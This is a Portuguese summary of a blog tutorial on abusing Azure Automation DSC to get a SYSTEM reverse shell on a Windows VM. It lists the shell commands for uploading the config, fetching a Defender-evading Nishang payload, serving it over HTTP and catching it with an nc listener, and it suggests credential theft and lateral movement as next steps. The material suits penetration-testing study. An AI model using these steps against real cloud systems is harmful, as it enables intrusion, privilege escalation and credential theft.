Confira o post completo em: https://medium.com/cepheisecurity/abusing-azure-dsc-remote-code-execution-and-privilege-escalation-ab8c35dd04fe

Resumo da Preparação e Etapas da Infraestrutura do Servidor Remoto (C2)

Visão Geral

O processo envolve configurar uma infraestrutura de servidor remoto para hospedar um payload modificado Invoke-PowerShellTcp.ps1 do Nishang, chamado RevPS.ps1, projetado para contornar o Windows Defender. O payload é servido a partir de uma máquina Kali Linux com IP 40.84.7.74 usando um servidor HTTP Python simples. A operação é executada por meio de várias etapas:

Etapa 1 — Criar Arquivos

• Arquivos Necessários: Dois scripts do PowerShell são necessários:

1. reverse_shell_config.ps1: Um arquivo de Configuração de Estado Desejado (DSC) que busca e executa o payload. Pode ser obtido em GitHub.

2. push_reverse_shell_config.ps1: Um script para publicar a configuração na VM, disponível em GitHub.

• Personalização: Variáveis e parâmetros nesses arquivos devem ser adaptados ao ambiente específico do usuário, incluindo nomes de recursos, caminhos de arquivos e identificadores de servidor/payload.

Etapa 2 — Compactar Arquivo de Configuração

• O reverse_shell_config.ps1 é comprimido em um arquivo .zip, tornando-o pronto para transferência para a Conta de Armazenamento do Azure.

Compress-Archive -Path .\reverse_shell_config.ps1 -DestinationPath .\reverse_shell_config.ps1.zip

Passo 3 — Definir Contexto de Armazenamento & Fazer Upload

• O arquivo de configuração compactado é enviado para um contêiner de Armazenamento do Azure predefinido, azure-pentest, usando o cmdlet Set-AzStorageBlobContent do Azure.

Set-AzStorageBlobContent -File "reverse_shell_config.ps1.zip" -Container "azure-pentest" -Blob "reverse_shell_config.ps1.zip" -Context $ctx

Passo 4 — Preparar o Kali Box

• O servidor Kali faz o download do payload RevPS.ps1 de um repositório do GitHub.

wget https://raw.githubusercontent.com/nickpupp0/AzureDSCAbuse/master/RevPS.ps1

• O script é editado para especificar o VM Windows alvo e a porta para o shell reverso.

Passo 5 — Publicar Arquivo de Configuração

• O arquivo de configuração é executado, resultando na implantação do script de shell reverso no local especificado no VM Windows.

Passo 6 — Hospedar Payload e Configurar Ouvinte

• Um SimpleHTTPServer em Python é iniciado para hospedar o payload, juntamente com um ouvinte Netcat para capturar conexões de entrada.

sudo python -m SimpleHTTPServer 80
sudo nc -nlvp 443

• A tarefa agendada executa a carga útil, alcançando privilégios de nível SYSTEM.

Conclusão

A execução bem-sucedida desse processo abre inúmeras possibilidades para ações adicionais, como extração de credenciais ou expansão do ataque para várias VMs. O guia incentiva a aprendizagem contínua e a criatividade no âmbito do Azure Automation DSC.